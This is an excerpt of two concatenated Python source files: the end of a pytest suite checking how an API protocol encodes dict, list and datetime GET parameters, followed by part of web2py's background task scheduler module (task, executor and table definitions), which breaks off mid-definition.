"/api/v1/test/1/monty?filter.a=b&filter.c=d&filter.c=e&filter.g=h",
),
(
Dict[str, List[str]],
{"a": ["b"], "c": ["d", "e"], ",&?=%": [",&?=%", "f"], ".g.h": ["i"]},
"/api/v1/test/1/monty?filter.a=b&filter.c=d&filter.c=e"
"&filter.%2C%26%3F%3D%25=%2C%26%3F%3D%25&filter.%2C%26%3F%3D%25=f&filter..g.h=i",
),
(
List[str],
[
"a ",
"b,",
"c",
],
"/api/v1/test/1/monty?filter=a+&filter=b%2C&filter=c",
),
(
List[str],
["a", "b", ",&?=%", "c", "."],
"/api/v1/test/1/monty?filter=a&filter=b&filter=%2C%26%3F%3D%25&filter=c&filter=.",
),
(List[str], ["a ", "b", "c", ","], "/api/v1/test/1/monty?filter=a+&filter=b&filter=c&filter=%2C"),
],
)
@pytest.mark.asyncio
async def test_dict_list_get_roundtrip(
unused_tcp_port, postgres_db, database_name, async_finalizer, param_type, param_value, expected_url
):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"], strict_typing=False)
def test_method(id: str, name: str, filter: param_type) -> Any: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: param_type) -> Any: # NOQA
return filter
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": param_value}
)
assert request.url == expected_url
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter=param_value)
assert response.code == 200
assert response.result["data"] == param_value
@pytest.mark.asyncio
async def test_dict_get_optional(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Optional[Dict[str, str]] = None) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: Optional[Dict[str, str]] = None) -> str: # NOQA
return ",".join(filter.keys()) if filter is not None else ""
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": {"a": "b"}}
)
assert request.url == "/api/v1/test/1/monty?filter.a=b"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter={"a": "b", "c": "d"})
assert response.code == 200
assert response.result["data"] == "a,c"
response: Result = await client.test_method(1, "monty")
assert response.code == 200
assert response.result["data"] == ""
@pytest.mark.asyncio
async def test_dict_list_nested_get_optional(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Optional[Dict[str, List[str]]] = None) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: Optional[Dict[str, List[str]]] = None) -> str: # NOQA
return ",".join(filter.keys()) if filter is not None else ""
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": {"a": ["b"]}}
)
assert request.url == "/api/v1/test/1/monty?filter.a=b"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter={"a": "b", "c": ["d", "e"]})
assert response.code == 200
assert response.result["data"] == "a,c"
response: Result = await client.test_method(1, "monty")
assert response.code == 200
assert response.result["data"] == ""
@pytest.mark.parametrize(
"param_type,expected_error_message",
[
(
Dict[str, Dict[str, str]],
"nested dictionaries and union types for dictionary values are not supported for GET requests",
),
(
Dict[str, Union[str, List[str]]],
"nested dictionaries and union types for dictionary values are not supported for GET requests",
),
(List[Dict[str, str]], "lists of dictionaries and lists of lists are not supported for GET requests"),
(List[List[str]], "lists of dictionaries and lists of lists are not supported for GET requests"),
],
)
@pytest.mark.asyncio
async def test_dict_list_get_invalid(
unused_tcp_port, postgres_db, database_name, async_finalizer, param_type, expected_error_message
):
configure(unused_tcp_port, database_name, postgres_db.port)
with pytest.raises(InvalidMethodDefinition) as e:
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: param_type) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: param_type) -> str: # NOQA
return ""
assert expected_error_message in str(e)
@pytest.mark.asyncio
async def test_list_get_optional(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, sort: Optional[List[int]] = None) -> str: # NOQA
pass
@protocol.typedmethod(path="/test_uuid/<id>", operation="GET", client_types=["api"])
def test_method_uuid(id: str, sort: Optional[List[uuid.UUID]] = None) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, sort: Optional[List[int]] = None) -> str: # NOQA
return str(sort) if sort else ""
@protocol.handle(test_method_uuid)
async def test_method_uuid(self, id: str, sort: Optional[List[uuid.UUID]] = None) -> str: # NOQA
return str(sort) if sort else ""
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "sort": [1, 2]}
)
assert request.url == "/api/v1/test/1/monty?sort=1&sort=2"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", sort=[1, 2])
assert response.code == 200
assert response.result["data"] == "[1, 2]"
response: Result = await client.test_method(1, "monty")
assert response.code == 200
assert response.result["data"] == ""
uuids = [uuid.uuid4(), uuid.uuid4()]
request = MethodProperties.methods["test_method_uuid"][0].build_call(args=[], kwargs={"id": "1", "sort": uuids})
assert request.url == f"/api/v1/test_uuid/1?sort={uuids[0]}&sort={uuids[1]}"
@pytest.mark.asyncio
async def test_dicts_multiple_get(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Dict[str, List[str]], another_filter: Dict[str, str]) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(
self, id: str, name: str, filter: Dict[str, List[str]], another_filter: Dict[str, str]
) -> str: # NOQA
return ",".join(chain(filter.keys(), another_filter.keys()))
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": {"a": ["b", "c"]}, "another_filter": {"d": "e"}}
)
assert request.url == "/api/v1/test/1/monty?filter.a=b&filter.a=c&another_filter.d=e"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter={"a": ["b"], "c": ["d", "e"]}, another_filter={"x": "y"})
assert response.code == 200
assert response.result["data"] == "a,c,x"
@pytest.mark.asyncio
async def test_dict_list_get_by_url(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Dict[str, str]) -> str: # NOQA
pass
@protocol.typedmethod(path="/test_list/<id>", operation="GET", client_types=["api"])
def test_method_list(id: str, filter: List[int]) -> str: # NOQA
pass
@protocol.typedmethod(path="/test_dict_of_lists/<id>", operation="GET", client_types=["api"])
def test_method_dict_of_lists(id: str, filter: Dict[str, List[str]]) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: Dict[str, str]) -> str: # NOQA
return ",".join(filter.keys())
@protocol.handle(test_method_list)
async def test_method_list(self, id: str, filter: List[int]) -> str: # NOQA
return str(filter)
@protocol.handle(test_method_dict_of_lists)
async def test_method_dict_of_lists(self, id: str, filter: Dict[str, List[str]]) -> str: # NOQA
return ",".join(filter.keys())
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = AsyncHTTPClient()
response = await client.fetch(f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty?filter.=b", raise_error=False)
assert response.code == 400
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty?filter.a=b&filter.=c", raise_error=False
)
assert response.code == 400
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty?filter.a=b&filter.a=c", raise_error=False
)
assert response.code == 400
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_list/1?filter.a=b&filter.=c", raise_error=False
)
assert response.code == 400
# Integer should also work
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_list/1?filter=42&filter=45", raise_error=False
)
assert response.code == 200
# list nested in dict
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_dict_of_lists/1?filter.a=42&filter.a=55&filter.b=e",
raise_error=False,
)
assert response.code == 200
filter_with_comma = {"filter.a": "42,55,%2C70", "filter.b": "e"}
url = url_concat(f"http://localhost:{server_bind_port.get()}/api/v1/test_dict_of_lists/1", filter_with_comma)
response = await client.fetch(
url,
raise_error=False,
)
assert response.code == 200
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_dict_of_lists/1?filter.a=42&filter.a=55&filter.&filter.c=a",
raise_error=False,
)
assert response.code == 400
filter_with_comma = {"filter.a": "b", "filter.c": "e", "filter.,&?=%": ",&?=%"}
url = url_concat(f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty", filter_with_comma)
response = await client.fetch(
url,
raise_error=False,
)
assert response.code == 200
@pytest.mark.asyncio
async def test_api_datetime_utc(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test API input and output conversion for timestamps. Objects should be either timezone-aware or implicit UTC.
"""
configure(unused_tcp_port, database_name, postgres_db.port)
timezone: datetime.timezone = datetime.timezone(datetime.timedelta(hours=2))
now: datetime.datetime = datetime.datetime.now().astimezone(timezone)
naive_utc: datetime.datetime = now.astimezone(datetime.timezone.utc).replace(tzinfo=None)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method(timestamp: datetime.datetime) -> List[datetime.datetime]:
pass
@protocol.handle(test_method)
async def test_method(self, timestamp: datetime.datetime) -> List[datetime.datetime]:
assert timestamp.tzinfo is not None
assert timestamp == now
return [
now,
now.astimezone(datetime.timezone.utc),
now.astimezone(datetime.timezone.utc).replace(tzinfo=None),
]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(timestamp=now)
assert response.code == 200
assert all(pydantic.parse_obj_as(datetime.datetime, timestamp) == naive_utc for timestamp in response.result["data"])
response: Result = await client.test_method(timestamp=now.astimezone(datetime.timezone.utc))
assert response.code == 200
response: Result = await client.test_method(timestamp=now.astimezone(datetime.timezone.utc).replace(tzinfo=None))
assert response.code == 200
response: Result = await client.test_method(timestamp=now.replace(tzinfo=None))
assert response.code == 500
# Test REST API without going through Python client
port = opt.get_bind_port()
client = AsyncHTTPClient()
async def request(timestamp: datetime.datetime) -> tornado.httpclient.HTTPResponse:
request = HTTPRequest(
url=(
f"http://localhost:{port}/api/v1/test?timestamp="
f"{urllib.parse.quote(timestamp.isoformat(timespec='microseconds'))}"
),
method="GET",
)
return await client.fetch(request)
response = await request(now)
assert response.code == 200
response = await request(now.astimezone(datetime.timezone.utc).replace(tzinfo=None))
assert response.code == 200
with pytest.raises(tornado.httpclient.HTTPClientError):
response = await request(now.replace(tzinfo=None))
@pytest.mark.asyncio
async def test_dict_of_list(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test API input and output conversion for timestamps. Objects should be either timezone-aware or implicit UTC.
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class APydanticType(BaseModel):
attr: int
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=[const.ClientType.api])
def test_method(id: str) -> Dict[str, List[APydanticType]]:
pass
@protocol.handle(test_method)
async def test_method(self, id: str) -> Dict[str, List[APydanticType]]:
return {id: [APydanticType(attr=1), APydanticType(attr=5)]}
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client: protocol.Client = protocol.Client("client")
result = await client.test_method(id="test")
assert result.code == 200, result.result["message"]
assert result.result["data"] == {"test": [{"attr": 1}, {"attr": 5}]}
@pytest.mark.asyncio
async def test_return_value_with_meta(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method(with_warning: bool) -> ReturnValueWithMeta[str]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, with_warning: bool) -> ReturnValueWithMeta: # NOQA
metadata = {"additionalInfo": f"Today's bitcoin exchange rate is: {(random.random() * 100000):.2f}$"}
result = ReturnValueWithMeta(response="abcd", metadata=metadata)
if with_warning:
result.add_warnings(["Warning message"])
return result
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client: protocol.Client = protocol.Client("client")
response = await client.test_method(False)
assert response.code == 200
assert response.result["data"] == "abcd"
assert response.result["metadata"].get("additionalInfo") is not None
assert response.result["metadata"].get("warnings") is None
response = await client.test_method(True)
assert response.code == 200
assert response.result["data"] == "abcd"
assert response.result["metadata"].get("additionalInfo") is not None
assert response.result["metadata"].get("warnings") is not None
|
scheduler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Background processes made simple
---------------------------------
"""
USAGE = """
## Example
For any existing app
Create File: app/models/scheduler.py ======
from gluon.scheduler import Scheduler
def demo1(*args,**vars):
print 'you passed args=%s and vars=%s' % (args, vars)
return 'done!'
def demo2():
1/0
scheduler = Scheduler(db,dict(demo1=demo1,demo2=demo2))
## run worker nodes with:
cd web2py
python web2py.py -K myapp
or
python gluon/scheduler.py -u sqlite://storage.sqlite \
-f applications/myapp/databases/ \
-t mytasks.py
(-h for info)
python scheduler.py -h
## schedule jobs using
http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task
## monitor scheduled jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id>0
## view completed jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id>0
## view workers
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id>0
## To install the scheduler as a permanent daemon on Linux (w/ Upstart), put
## the following into /etc/init/web2py-scheduler.conf:
## (This assumes your web2py instance is installed in <user>'s home directory,
## running as <user>, with app <myapp>, on network interface eth0.)
description "web2py task scheduler"
start on (local-filesystems and net-device-up IFACE=eth0)
stop on shutdown
respawn limit 8 60 # Give up if restart occurs 8 times in 60 seconds.
exec sudo -u <user> python /home/<user>/web2py/web2py.py -K <myapp>
respawn
## You can then start/stop/restart/check status of the daemon with:
sudo start web2py-scheduler
sudo stop web2py-scheduler
sudo restart web2py-scheduler
sudo status web2py-scheduler
"""
import os
import time
import multiprocessing
import sys
import threading
import traceback
import signal
import socket
import datetime
import logging
import optparse
import types
import Queue
path = os.getcwd()
if 'WEB2PY_PATH' not in os.environ:
os.environ['WEB2PY_PATH'] = path
try:
# try external module
from simplejson import loads, dumps
except ImportError:
try:
# try stdlib (Python >= 2.6)
from json import loads, dumps
except:
# fallback to pure-Python module
from gluon.contrib.simplejson import loads, dumps
IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid())
logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER)
from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB
from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB
from gluon.utils import web2py_uuid
from gluon.storage import Storage
QUEUED = 'QUEUED'
ASSIGNED = 'ASSIGNED'
RUNNING = 'RUNNING'
COMPLETED = 'COMPLETED'
FAILED = 'FAILED'
TIMEOUT = 'TIMEOUT'
STOPPED = 'STOPPED'
ACTIVE = 'ACTIVE'
TERMINATE = 'TERMINATE'
DISABLED = 'DISABLED'
KILL = 'KILL'
PICK = 'PICK'
STOP_TASK = 'STOP_TASK'
EXPIRED = 'EXPIRED'
SECONDS = 1
HEARTBEAT = 3 * SECONDS
MAXHIBERNATION = 10
CLEAROUT = '!clear!'
CALLABLETYPES = (types.LambdaType, types.FunctionType,
types.BuiltinFunctionType,
types.MethodType, types.BuiltinMethodType)
class Task(object):
"""Defines a "task" object that gets passed from the main thread to the
executor's one
"""
def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs):
logger.debug(' new task allocated: %s.%s', app, function)
self.app = app
self.function = function
self.timeout = timeout
self.args = args # json
self.vars = vars # json
self.__dict__.update(kwargs)
def __str__(self):
return '<Task: %s>' % self.function
class TaskReport(object):
"""Defines a "task report" object that gets passed from the executor's
thread to the main one
"""
def __init__(self, status, result=None, output=None, tb=None):
logger.debug(' new task report: %s', status)
if tb:
logger.debug(' traceback: %s', tb)
else:
logger.debug(' result: %s', result)
self.status = status
self.result = result
self.output = output
self.tb = tb
def __str__(self):
return '<TaskReport: %s>' % self.status
class JobGraph(object):
"""Experimental: with JobGraph you can specify
dependencies amongs tasks"""
def __init__(self, db, job_name):
self.job_name = job_name or 'job_0'
self.db = db
def add_deps(self, task_parent, task_child):
"""Creates a dependency between task_parent and task_child"""
self.db.scheduler_task_deps.insert(task_parent=task_parent,
task_child=task_child,
job_name=self.job_name)
def validate(self, job_name):
"""Validates if all tasks job_name can be completed, i.e. there
are no mutual dependencies among tasks.
Commits at the end if successfull, or it rollbacks the entire
transaction. Handle with care!"""
db = self.db
sd = db.scheduler_task_deps
if job_name:
q = sd.job_name == job_name
else:
q = sd.id > 0
edges = db(q).select()
nested_dict = {}
for row in edges:
k = row.task_parent
if k in nested_dict:
nested_dict[k].add(row.task_child)
else:
nested_dict[k] = set((row.task_child,))
try:
rtn = []
for k, v in nested_dict.items():
v.discard(k) # Ignore self dependencies
extra_items_in_deps = reduce(set.union, nested_dict.values()) - set(nested_dict.keys())
nested_dict.update(dict((item, set()) for item in extra_items_in_deps))
while True:
ordered = set(item for item, dep in nested_dict.items() if not dep)
if not ordered:
break
rtn.append(ordered)
nested_dict = dict(
(item, (dep - ordered)) for item, dep in nested_dict.items()
if item not in ordered
)
assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict
db.commit()
return rtn
except:
db.rollback()
return None
def demo_function(*argv, **kwargs):
""" test function """
for i in range(argv[0]):
print 'click', i
time.sleep(1)
return 'done'
# the two functions below deal with simplejson decoding as unicode, esp for the dict decode
# and subsequent usage as function Keyword arguments unicode variable names won't work!
# borrowed from http://stackoverflow.com/questions/956867/how-to-get-string-objects-instead-unicode-ones-from-json-in-python
def _decode_list(lst):
newlist = []
for i in lst:
if isinstance(i, unicode):
i = i.encode('utf-8')
elif isinstance(i, list):
i = _decode_list(i)
newlist.append(i)
return newlist
def _decode_dict(dct):
newdict = {}
for k, v in dct.iteritems():
if isinstance(k, unicode):
k = k.encode('utf-8')
if isinstance(v, unicode):
v = v.encode('utf-8')
elif isinstance(v, list):
v = _decode_list(v)
newdict[k] = v
return newdict
def executor(queue, task, out):
"""The function used to execute tasks in the background process"""
logger.debug(' task started')
class LogOutput(object):
"""Facility to log output at intervals"""
def __init__(self, out_queue):
self.out_queue = out_queue
self.stdout = sys.stdout
sys.stdout = self
def __del__(self):
sys.stdout = self.stdout
def flush(self):
pass
def write(self, data):
self.out_queue.put(data)
W2P_TASK = Storage({'id': task.task_id, 'uuid': task.uuid})
stdout = LogOutput(out)
try:
if task.app:
os.chdir(os.environ['WEB2PY_PATH'])
from gluon.shell import env, parse_path_info
from gluon import current
level = logging.getLogger().getEffectiveLevel()
logging.getLogger().setLevel(logging.WARN)
# Get controller-specific subdirectory if task.app is of
# form 'app/controller'
(a, c, f) = parse_path_info(task.app)
_env = env(a=a, c=c, import_models=True)
logging.getLogger().setLevel(level)
f = task.function
functions = current._scheduler.tasks
if not functions:
#look into env
_function = _env.get(f)
else:
_function = functions.get(f)
if not isinstance(_function, CALLABLETYPES):
raise NameError(
"name '%s' not found in scheduler's environment" % f)
# Inject W2P_TASK into environment
_env.update({'W2P_TASK': W2P_TASK})
# Inject W2P_TASK into current
from gluon import current
current.W2P_TASK = W2P_TASK
globals().update(_env)
args = _decode_list(loads(task.args))
vars = loads(task.vars, object_hook=_decode_dict)
result = dumps(_function(*args, **vars))
else:
### for testing purpose only
result = eval(task.function)(
*loads(task.args, object_hook=_decode_dict),
**loads(task.vars, object_hook=_decode_dict))
queue.put(TaskReport('COMPLETED', result=result))
except BaseException, e:
tb = traceback.format_exc()
queue.put(TaskReport('FAILED', tb=tb))
del stdout
class MetaScheduler(threading.Thread):
"""Base class documenting scheduler's base methods"""
def __init__(self):
threading.Thread.__init__(self)
self.process = None # the background process
self.have_heartbeat = True # set to False to kill
self.empty_runs = 0
def async(self, task):
"""Starts the background process
Args:
task : a `Task` object
Returns:
tuple: containing::
('ok',result,output)
('error',exception,None)
('timeout',None,None)
('terminated',None,None)
"""
db = self.db
sr = db.scheduler_run
out = multiprocessing.Queue()
queue = multiprocessing.Queue(maxsize=1)
p = multiprocessing.Process(target=executor, args=(queue, task, out))
self.process = p
logger.debug(' task starting')
p.start()
task_output = ""
tout = ""
try:
if task.sync_output > 0:
run_timeout = task.sync_output
else:
run_timeout = task.timeout
start = time.time()
while p.is_alive() and (not task.timeout or time.time() - start < task.timeout):
if tout:
try:
logger.debug(' partial output saved')
db(sr.id == task.run_id).update(run_output=task_output)
db.commit()
except:
pass
p.join(timeout=run_timeout)
tout = ""
while not out.empty():
tout += out.get()
if tout:
logger.debug(' partial output: "%s"' % str(tout))
if CLEAROUT in tout:
task_output = tout[
tout.rfind(CLEAROUT) + len(CLEAROUT):]
else:
task_output += tout
except:
p.terminate()
p.join()
self.have_heartbeat = False
logger.debug(' task stopped by general exception')
tr = TaskReport(STOPPED)
else:
if p.is_alive():
p.terminate()
logger.debug(' task timeout')
try:
# we try to get a traceback here
tr = queue.get(timeout=2)
tr.status = TIMEOUT
tr.output = task_output
except Queue.Empty:
tr = TaskReport(TIMEOUT)
elif queue.empty():
self.have_heartbeat = False
logger.debug(' task stopped')
tr = TaskReport(STOPPED)
else:
logger.debug(' task completed or failed')
tr = queue.get()
tr.output = task_output
return tr
def die(self):
"""Forces termination of the worker process along with any running
task"""
logger.info('die!')
self.have_heartbeat = False
self.terminate_process()
def give_up(self):
"""Waits for any running task to be executed, then exits the worker
process"""
logger.info('Giving up as soon as possible!')
self.have_heartbeat = False
def terminate_process(self):
"""Terminates any running tasks (internal use only)"""
try:
self.process.terminate()
except:
pass # no process to terminate
def run(self):
"""This is executed by the main thread to send heartbeats"""
counter = 0
while self.have_heartbeat:
self.send_heartbeat(counter)
counter += 1
def start_heartbeats(self):
self.start()
def send_heartbeat(self, counter):
print 'thum'
time.sleep(1)
def pop_task(self):
"""Fetches a task ready to be executed"""
return Task(
app=None,
function='demo_function',
timeout=7,
args='[2]',
vars='{}')
def report_task(self, task, task_report):
"""Creates a task report"""
print 'reporting task'
pass
def sleep(self):
pass
def loop(self):
"""Main loop, fetching tasks and starting executor's background
processes"""
try:
self.start_heartbeats()
while True and self.have_heartbeat:
logger.debug('looping...')
task = self.pop_task()
if task:
self.empty_runs = 0
self.report_task(task, self.async(task))
else:
self.empty_runs += 1
logger.debug('sleeping...')
if self.max_empty_runs != 0:
logger.debug('empty runs %s/%s',
self.empty_runs, self.max_empty_runs)
if self.empty_runs >= self.max_empty_runs:
logger.info(
'empty runs limit reached, killing myself')
self.die()
self.sleep()
except KeyboardInterrupt:
self.die()
TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED)
RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED)
WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK)
class TYPE(object):
"""
Validator that checks whether field is valid json and validates its type.
Used for `args` and `vars` of the scheduler_task table
"""
def __init__(self, myclass=list, parse=False):
self.myclass = myclass
self.parse = parse
def __call__(self, value):
from gluon import current
try:
obj = loads(value)
except:
return (value, current.T('invalid json'))
else:
if isinstance(obj, self.myclass):
if self.parse:
return (obj, None)
else:
return (value, None)
else:
return (value, current.T('Not of type: %s') % self.myclass)
class Scheduler(MetaScheduler):
"""Scheduler object
Args:
db: DAL connection where Scheduler will create its tables
tasks(dict): either a dict containing name-->func or None.
If None, functions will be searched in the environment
migrate(bool): turn migration on/off for the Scheduler's tables
worker_name(str): force worker_name to identify each process.
Leave it to None to autoassign a name (hostname#pid)
group_names(list): process tasks belonging to this group
defaults to ['main'] if nothing gets passed
heartbeat(int): how many seconds the worker sleeps between one
execution and the following one. Indirectly sets how many seconds
will pass between checks for new tasks
max_empty_runs(int): how many loops are allowed to pass without
processing any tasks before exiting the process. 0 to keep always
the process alive
discard_results(bool): Scheduler stores executions's details into the
scheduler_run table. By default, only if there is a result the
details are kept. Turning this to True means discarding results
even for tasks that return something
utc_time(bool): do all datetime calculations assuming UTC as the
timezone. Remember to pass `start_time` and `stop_time` to tasks
accordingly
"""
def __init__(self, db, tasks=None, migrate=True,
worker_name=None, group_names=None, heartbeat=HEARTBEAT,
max_empty_runs=0, discard_results=False, utc_time=False):
MetaScheduler.__init__(self)
self.db = db
self.db_thread = None
self.tasks = tasks
self.group_names = group_names or ['main']
self.heartbeat = heartbeat
self.worker_name = worker_name or IDENTIFIER
self.max_empty_runs = max_empty_runs
self.discard_results = discard_results
self.is_a_ticker = False
self.do_assign_tasks = False
self.greedy = False
self.utc_time = utc_time
self.w_stats = Storage(
dict(
status=RUNNING,
sleep=heartbeat,
total=0,
errors=0,
empty_runs=0,
queue=0,
distribution=None,
workers=0)
) # dict holding statistics
from gluon import current
current._scheduler = self
self.define_tables(db, migrate=migrate)
def __get_migrate(self, tablename, migrate=True):
if migrate is False:
return False
elif migrate is True:
return True
elif isinstance(migrate, str):
return "%s%s.table" % (migrate, tablename)
return True
def now(self):
"""Shortcut that fetches current time based on UTC preferences"""
return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now()
def set_requirements(self, scheduler_task):
"""Called to set defaults for lazy_tables connections"""
from gluon import current
if hasattr(current, 'request'):
scheduler_task.application_name.default = '%s/%s' % (
current.request.application, current.request.controller
)
def define_tables(self, db, migrate):
"""Defines Scheduler tables structure"""
from pydal.base import DEFAULT
logger.debug('defining tables (migrate=%s)', migrate)
now = self.now
db.define_table(
'scheduler_task',
Field('application_name', requires=IS_NOT_EMPTY(),
default=None, writable=False),
Field('task_name', default=None),
Field('group_name', default='main'),
Field('status', requires=IS_IN_SET(TASK_STATUS),
default=QUEUED, writable=False),
Field('function_name',
requires=IS_IN_SET(sorted(self.tasks.keys()))
if self.tasks else DEFAULT),
Field('uuid', length=255,
requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'),
unique=True, default=web2py_uuid),
Field('args', 'text', default='[]', requires=TYPE(list)),
Field('vars', 'text', default='{}', requires=TYPE(dict)),
Field('enabled', 'boolean', default=True),
Field('start_time', 'datetime', default=now,
requires=IS_DATETIME()),
Field('next_run_time', 'datetime', default=now),
Field('stop_time', 'datetime'),
Field('repeats', 'integer', default=1, comment="0=unlimited",
requires=IS_INT_IN_RANGE(0, None)),
Field('retry_failed', 'integer', default=0, comment="-1=unlimited",
requires=IS_INT_IN_RANGE(-1, None)),
Field('period', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(0, None)),
Field('prevent_drift', 'boolean', default=False,
comment='Cron-like start_times between runs'),
Field('timeout', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(1, None)),
Field('sync_output', 'integer', default=0,
comment="update output every n sec: 0=never",
requires=IS_INT_IN_RANGE(0, None)),
Field('times_run', 'integer', default=0, writable=False),
Field('times_failed', 'integer', default=0, writable=False),
Field('last_run_time', 'datetime', writable=False, readable=False),
Field('assigned_worker_name', default='', writable=False),
on_define=self.set_requirements,
migrate=self.__get_migrate('scheduler_task', migrate),
format='%(task_name)s')
db.define_table(
'scheduler_run',
Field('task_id', 'reference scheduler_task'),
Field('status', requires=IS_IN_SET(RUN_STATUS)),
Field('start_time', 'datetime'),
Field('stop_time', 'datetime'),
Field('run_output', 'text'),
Field('run_result', 'text'),
Field('traceback', 'text'),
Field('worker_name', default=self.worker_name),
migrate=self.__get_migrate('scheduler_run', migrate)
)
db.define_table(
'scheduler_worker',
